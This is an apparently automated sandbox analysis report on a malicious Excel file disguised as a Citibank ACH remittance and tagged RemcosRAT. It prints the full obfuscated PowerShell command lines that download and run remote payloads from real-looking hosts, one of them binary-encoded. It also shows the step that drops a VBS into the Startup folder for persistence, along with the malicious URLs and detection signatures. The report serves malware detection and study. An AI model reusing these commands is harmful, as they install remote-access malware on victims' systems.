Windows Analysis Report
ACH Remittance Advice_CITI25822.xls

Overview

General Information

Sample Name: ACH Remittance Advice_CITI25822.xls
Analysis ID: 690542
MD5: 3af8864299165b527737ecb59ec7f47b
SHA1: 7199e298af1f0f3273a3e6d9b4186805211c58b5
SHA256: f9b92212d4dbdbddabd88e8e49a5672b5a5bb8fc29243628578fd037de26fcfa
Tags: Citibank, RemcosRAT, xls

Detection

Score: 80
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Antivirus detection for URL or domain
Wscript starts Powershell (via cmd or directly)
Very long command line found
Suspicious powershell command line found
Document contains an embedded macro with GUI obfuscation
Document exploit detected (process start blacklist hit)
Drops VBS files to the startup folder
Queries the volume information (name, serial number etc) of a device
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Stores large binary data to the registry
JA3 SSL client fingerprint seen in connection with other malware
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Uses insecure TLS / SSL version for HTTPS connection
Document misses a certain OLE stream usually present in this Microsoft Office document type
Contains long sleeps (>= 3 min)
Enables debug privileges
Document contains embedded VBA macros
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)

Classification

  • System is w7x64
  • EXCEL.EXE (PID: 2496 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • wscript.exe (PID: 1212 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\sfoWQ.js" MD5: 045451FA238A75305CC26AC982472367)
      • powershell.exe (PID: 1496 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ErrorActionPreference = 'SilentlyContinue' ;$t56fg = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol = $t56fg;$we22='eW.teN tc' + 'ejbO-weN('; $b4df='olnwoD.)tnei' + 'lCb'; $c3=')''sbv.ewq\''+pmet:vne$,''sbv.htig/cnys/sr.gnitsohtenuy.ddapok//:sptth''(eliFda';$TC=$c3,$b4df,$we22 -Join '';IEX($TC|% {-join($_[-1..-$_.Length])});start-process($env:temp+ '\qwe.vbs');remove-item ($env:appdata + '\sfoWQ.js') MD5: 852D67A27E454BD389FA7F02A8CBE23F)
        • wscript.exe (PID: 1156 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\qwe.vbs" MD5: 045451FA238A75305CC26AC982472367)
          • powershell.exe (PID: 2888 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $gf=(00100100,01000101,01110010,01110010,01101111,01110010,01000001,01100011,01110100,01101001,01101111,01101110,01010000,01110010,01100101,01100110,01100101,01110010,01100101,01101110,01100011,01100101,00100000,00111101,00100000,00100111,01010011,01101001,01101100,01100101,01101110,01110100,01101100,01111001,01000011,01101111,01101110,01110100,01101001,01101110,01110101,01100101,00100111,00111011,00100100,01110100,00110101,00110110,01100110,01100111,00100000,00111101,00100000,01011011,01000101,01101110,01110101,01101101,01011101,00111010,00111010,01010100,01101111,01001111,01100010,01101010,01100101,01100011,01110100,00101000,01011011,01010011,01111001,01110011,01110100,01100101,01101101,00101110,01001110,01100101,01110100,00101110,01010011,01100101,01100011,01110101,01110010,01101001,01110100,01111001,01010000,01110010,01101111,01110100,01101111,01100011,01101111,01101100,01010100,01111001,01110000,01100101,01011101,00101100,00100000,00110011,00110000,00110111,00110010,00101001,00111011,01011011,01010011,01111001,01110011,01110100,01100101,01101101,00101110,01001110,01100101,01110100,00101110,01010011,01100101,01110010,01110110,01101001,01100011,01100101,01010000,01101111,01101001,01101110,01110100,01001101,01100001,01101110,01100001,01100111,01100101,01110010,01011101,00111010,00111010,01010011,01100101,01100011,01110101,01110010,01101001,01110100,01111001,01010000,01110010,01101111,01110100,01101111,01100011,01101111,01101100,00100000,00111101,00100000,00100100,01110100,00110101,00110110,01100110,01100111,00111011,01000001,01100100,01100100,00101101,01010100,01111001,01110000,01100101,00100000,00101101,01000001,01110011,01110011,01100101,01101101,01100010,01101100,01111001,01001110,01100001,01101101,01100101,00100000,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,0110110
0,01000010,01100001,01110011,01101001,01100011,00111011,01100100,01101111,00100000,01111011,00100100,01110000,01101001,01101110,01100111,00100000,00111101,00100000,01110100,01100101,01110011,01110100,00101101,01100011,01101111,01101110,01101110,01100101,01100011,01110100,01101001,01101111,01101110,00100000,00101101,01100011,01101111,01101101,01110000,00100000,01100111,01101111,01101111,01100111,01101100,01100101,00101110,01100011,01101111,01101101,00100000,00101101,01100011,01101111,01110101,01101110,01110100,00100000,00110001,00100000,00101101,01010001,01110101,01101001,01100101,01110100,01111101,00100000,01110101,01101110,01110100,01101001,01101100,00100000,00101000,00100100,01110000,01101001,01101110,01100111,00101001,00111011,00100100,01110100,01110100,01111001,00111101,01010000,00101000,00100111,00101000,01001110,01100101,01110111,00101101,00100111,00101011,00100111,01001111,01100010,01101010,01100101,00100111,00101011,00100111,01100011,01110100,00100000,01001110,01100101,00100111,00101011,00100111,01110100,00101110,01010111,01100101,00100111,00101011,00100111,01100010,01000011,01101100,01101001,00100111,00101011,00100111,01100101,01101110,01110100,00101001,00100111,00101001,00111011,00100100,01101101,01110110,00111101,00100000,01011011,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00101110,01001001,01101110,01110100,01100101,01110010,01100001,01100011,01110100,01101001,01101111,01101110,01011101,00111010,00111010,01000011,01100001,01101100,01101100,01000010,01111001,01101110,01100001,01101101,01100101,00101000,00100100,01110100,01110100,01111001,00101100,00100111,01000100,01101111,01110111,01101110,00100111,00100000,00101011,00100000,00100111,01101100,01101111,01100001,01100100,00100111,00100000,00101011,00100000,00100111,01010011,01110100,01110010,00100111,00100000,00101011,00100000,00100111,01101001,01101110,01100111,
00100111,00101100,01011011,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00101110,01000011,01100001,01101100,01101100,01010100,01111001,01110000,01100101,01011101,00111010,00111010,01001101,01100101,01110100,01101000,01101111,01100100,00101100,00100111,01101000,01110100,01110100,01110000,00100111,00100000,00101011,00100000,00100111,00111010,00101111,00101111,00110010,00110000,00111001,00101110,00110001,00110010,00110111,00101110,00110010,00110000,00101110,00110001,00110011,00101111,01110010,01100101,01101101,01101001,01110100,00101110,01101010,01110000,01100111,00100111,00101001,01111100,01010000) | %{ [System.Text.Encoding]::UTF8.GetString([System.Convert]::ToInt32($_,2)) };$o00='ZE000'.replace('Z','I').replace('000','x');sal P $o00;([system.String]::Join('', $gf))|P MD5: 852D67A27E454BD389FA7F02A8CBE23F)
          • powershell.exe (PID: 1268 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Move-item 'C:\Users\user\AppData\Local\Temp\qwe.vbs' -Destination 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qwe.vbs' MD5: 852D67A27E454BD389FA7F02A8CBE23F)
    • wscript.exe (PID: 2964 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\sfoWQ.js" MD5: 045451FA238A75305CC26AC982472367)
      • powershell.exe (PID: 2716 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ErrorActionPreference = 'SilentlyContinue' ;$t56fg = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol = $t56fg;$we22='eW.teN tc' + 'ejbO-weN('; $b4df='olnwoD.)tnei' + 'lCb'; $c3=')''sbv.ewq\''+pmet:vne$,''sbv.htig/cnys/sr.gnitsohtenuy.ddapok//:sptth''(eliFda';$TC=$c3,$b4df,$we22 -Join '';IEX($TC|% {-join($_[-1..-$_.Length])});start-process($env:temp+ '\qwe.vbs');remove-item ($env:appdata + '\sfoWQ.js') MD5: 852D67A27E454BD389FA7F02A8CBE23F)
        • wscript.exe (PID: 512 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\qwe.vbs" MD5: 045451FA238A75305CC26AC982472367)
  • iexplore.exe (PID: 1204 cmdline: "C:\Program Files\Internet Explorer\iexplore.exe" -Embedding MD5: 4EB098135821348270F27157F7A84E65)
    • iexplore.exe (PID: 1832 cmdline: "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1204 CREDAT:275457 /prefetch:2 MD5: 8A590F790A98F3D77399BE457E01386A)
  • wscript.exe (PID: 1932 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qwe.vbs" MD5: 045451FA238A75305CC26AC982472367)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Snort rule has matched

AV Detection

Source: ACH Remittance Advice_CITI25822.xls | Virustotal: Detection: 13%
Source: http://209.127.20.13/firm.txt | Avira URL Cloud: Label: malware
Source: http://209.127.20.13/remit.jpg | Avira URL Cloud: Label: malware
Source: http://209.127.20.13/favicon.ico | Avira URL Cloud: Label: malware
Source: unknownHTTPS traffic detected: 194.247.196.66:443 -> 192.168.2.22:49171 version: TLS 1.0
Source: unknownHTTPS traffic detected: 194.247.196.66:443 -> 192.168.2.22:49175 version: TLS 1.0
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdb86)= source: powershell.exe, 00000003.00000002.922168339.00000000029E7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.967082775.0000000002C97000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbFile source: powershell.exe, 00000003.00000002.922168339.00000000029E7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.967082775.0000000002C97000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.pdbagemen source: powershell.exe, 00000003.00000002.922168339.00000000029E7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.967082775.0000000002C97000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: :ystem.pdb source: powershell.exe, 00000003.00000002.922168339.00000000029E7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.967082775.0000000002C97000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\System.pdbpdbtem.pdbIL source: powershell.exe, 00000003.00000002.922168339.00000000029E7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.967082775.0000000002C97000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\dll\System.pdb source: powershell.exe, 0000000F.00000002.966928962.0000000002B16000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbProg source: powershell.exe, 00000003.00000002.922168339.00000000029E7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.967082775.0000000002C97000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdbion source: powershell.exe, 0000000F.00000002.967082775.0000000002C97000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.pdb_3 source: powershell.exe, 00000003.00000002.922168339.00000000029E7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.967082775.0000000002C97000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\dll\System.pdbyp source: powershell.exe, 00000003.00000002.921917508.0000000002776000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.922168339.00000000029E7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.967082775.0000000002C97000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini

Software Vulnerabilities

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\wscript.exe
Source: Joe Sandbox View | JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
Source: global traffic | HTTP traffic detected: GET /sync/gith.vbs HTTP/1.1 | Host: kopadd.yunethosting.rs | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /remit.jpg HTTP/1.1 | Host: 209.127.20.13 | Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 209.127.20.13
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49175
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49171
Source: unknown | Network traffic detected: HTTP traffic on port 49175 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49171 -> 443
Source: unknown | TCP traffic detected without corresponding DNS query: 209.127.20.13
Source: powershell.exe, 00000003.00000002.921776971.0000000000434000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.963668157.00000000003DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: imagestore.dat.8.dr | String found in binary or memory: http://209.127.20.13/favicon.ico
Source: ~DF946FBCF6F1FE2AEE.TMP.6.dr, {70A1164C-250E-11ED-A620-ECF4BBB5915B}.dat.6.dr | String found in binary or memory: http://209.127.20.13/firm.txt
Source: powershell.exe, 00000003.00000002.922297732.0000000002B77000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.921776971.0000000000434000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.922336049.0000000002BAC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.922343704.0000000002BB8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.922327367.0000000002B9D000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.963668157.00000000003DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: powershell.exe, 00000003.00000002.922336049.0000000002BAC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: powershell.exe, 00000003.00000002.922336049.0000000002BAC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.922322263.0000000002B98000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.922343704.0000000002BB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
Source: powershell.exe, 00000003.00000002.922353988.0000000002BC5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000003.00000002.922327367.0000000002B9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: powershell.exe, 00000003.00000002.922336049.0000000002BAC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.922327367.0000000002B9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: powershell.exe, 00000003.00000002.922336049.0000000002BAC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.922343704.0000000002BB8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.922327367.0000000002B9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
Source: powershell.exe, 00000003.00000002.922297732.0000000002B77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
Source: powershell.exe, 00000003.00000002.922327367.0000000002B9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
Source: powershell.exe, 00000003.00000002.921776971.0000000000434000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.922327367.0000000002B9D000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.963668157.00000000003DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
Source: powershell.exe, 00000003.00000002.922297732.0000000002B77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
Source: powershell.exe, 00000003.00000002.922336049.0000000002BAC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.922322263.0000000002B98000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.922343704.0000000002BB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
Source: powershell.exe, 00000003.00000002.922336049.0000000002BAC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
Source: powershell.exe, 00000003.00000002.922336049.0000000002BAC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: powershell.exe, 00000003.00000002.922336049.0000000002BAC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.922327367.0000000002B9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: powershell.exe, 0000000C.00000002.945807312.00000000003DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.co
Source: powershell.exe, 00000003.00000002.921752019.0000000000409000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.921723586.00000000003EC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000003.943018679.0000000000451000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000003.943095970.000000000042E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
Source: powershell.exe, 00000003.00000002.921752019.0000000000409000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.921723586.00000000003EC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000003.943095970.000000000042E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: powershell.exe, 00000003.00000002.925896669.0000000003635000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://kopadd.y
Source: powershell.exe, 00000003.00000002.925896669.0000000003635000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://kopadd.yunethos(OE
Source: powershell.exe, 00000003.00000002.926844350.0000000003816000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://kopadd.yunethosting.rs
Source: powershell.exe, 00000003.00000002.925896669.0000000003635000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://kopadd.yunethosting.rs/s
Source: powershell.exe, 00000003.00000002.925896669.0000000003635000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://kopadd.yunethosting.rs/sync/gith.vbs
Source: powershell.exe, 00000003.00000002.925896669.0000000003635000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://kopadd.yunethosting.rs/sync/gith.vbsPEH
Source: powershell.exe, 00000003.00000002.922297732.0000000002B77000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.921776971.0000000000434000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.922336049.0000000002BAC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.922343704.0000000002BB8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.922327367.0000000002B9D000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.963668157.00000000003DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F7FAA8.emf
Source: unknown | DNS traffic detected: queries for: kopadd.yunethosting.rs
Source: global traffic | HTTP traffic detected: GET /firm.txt HTTP/1.1 | Accept: text/html, application/xhtml+xml, */* | Accept-Language: en-US | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Encoding: gzip, deflate | Host: 209.127.20.13 | DNT: 1 | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /favicon.ico HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko | Host: 209.127.20.13 | DNT: 1 | Connection: Keep-Alive

System Summary

Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ErrorActionPreference = 'SilentlyContinue' ;$t56fg = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol = $t56fg;$we22='eW.teN tc' + 'ejbO-weN('; $b4df='olnwoD.)tnei' + 'lCb'; $c3=')''sbv.ewq\''+pmet:vne$,''sbv.htig/cnys/sr.gnitsohtenuy.ddapok//:sptth''(eliFda';$TC=$c3,$b4df,$we22 -Join '';IEX($TC|% {-join($_[-1..-$_.Length])});start-process($env:temp+ '\qwe.vbs');remove-item ($env:appdata + '\sfoWQ.js')
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Move-item 'C:\Users\user\AppData\Local\Temp\qwe.vbs' -Destination 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qwe.vbs'
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ErrorActionPreference = 'SilentlyContinue' ;$t56fg = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol = $t56fg;$we22='eW.teN tc' + 'ejbO-weN('; $b4df='olnwoD.)tnei' + 'lCb'; $c3=')''sbv.ewq\''+pmet:vne$,''sbv.htig/cnys/sr.gnitsohtenuy.ddapok//:sptth''(eliFda';$TC=$c3,$b4df,$we22 -Join '';IEX($TC|% {-join($_[-1..-$_.Length])});start-process($env:temp+ '\qwe.vbs');remove-item ($env:appdata + '\sfoWQ.js')
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $gf=(...
Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 4874
Source: ACH Remittance Advice_CITI25822.xlsStream path 'Workbook' : Found suspicious string shell.application in non macro stream
Source: ~DF4FEF5585DDEBC2FF.TMP.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: ~DF837617B7CBBF1532.TMP.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: RecoveryStore.{70A1164A-250E-11ED-A620-ECF4BBB5915B}.dat.6.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: {70A1164C-250E-11ED-A620-ECF4BBB5915B}.dat.6.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: ACH Remittance Advice_CITI25822.xlsOLE indicator, VBA macros: true
Source: ACH Remittance Advice_CITI25822.xls.0.drOLE indicator, VBA macros: true
Source: ~DF9B400455113A3652.TMP.0.drOLE indicator, VBA macros: true
Source: ACH Remittance Advice_CITI25822.xlsVirustotal: Detection: 13%
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\sfoWQ.js"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\qwe.vbs"
Source: unknownProcess created: C:\Program Files\Internet Explorer\iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
Source: C:\Program Files\Internet Explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1204 CREDAT:275457 /prefetch:2
Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qwe.vbs"
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F414C260-6AC0-11CF-B6D1-00AA00BBBB58}\InprocServer32
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Roaming\sfoWQ.txt
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR6BEB.tmp
Source: classification engineClassification label: mal80.expl.evad.winXLS@20/31@4/2
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: ACH Remittance Advice_CITI25822.xlsOLE indicator, Workbook stream: true
Source: ACH Remittance Advice_CITI25822.xls.0.drOLE indicator, Workbook stream: true
Source: ~DF9B400455113A3652.TMP.0.drOLE indicator, Workbook stream: true
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdb86)= source: powershell.exe, 00000003.00000002.922168339.00000000029E7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.967082775.0000000002C97000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbFile source: powershell.exe, 00000003.00000002.922168339.00000000029E7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.967082775.0000000002C97000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.pdbagemen source: powershell.exe, 00000003.00000002.922168339.00000000029E7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.967082775.0000000002C97000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: :ystem.pdb source: powershell.exe, 00000003.00000002.922168339.00000000029E7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.967082775.0000000002C97000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\System.pdbpdbtem.pdbIL source: powershell.exe, 00000003.00000002.922168339.00000000029E7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.967082775.0000000002C97000.00000004.00000020.00020000.00000000.sdmp
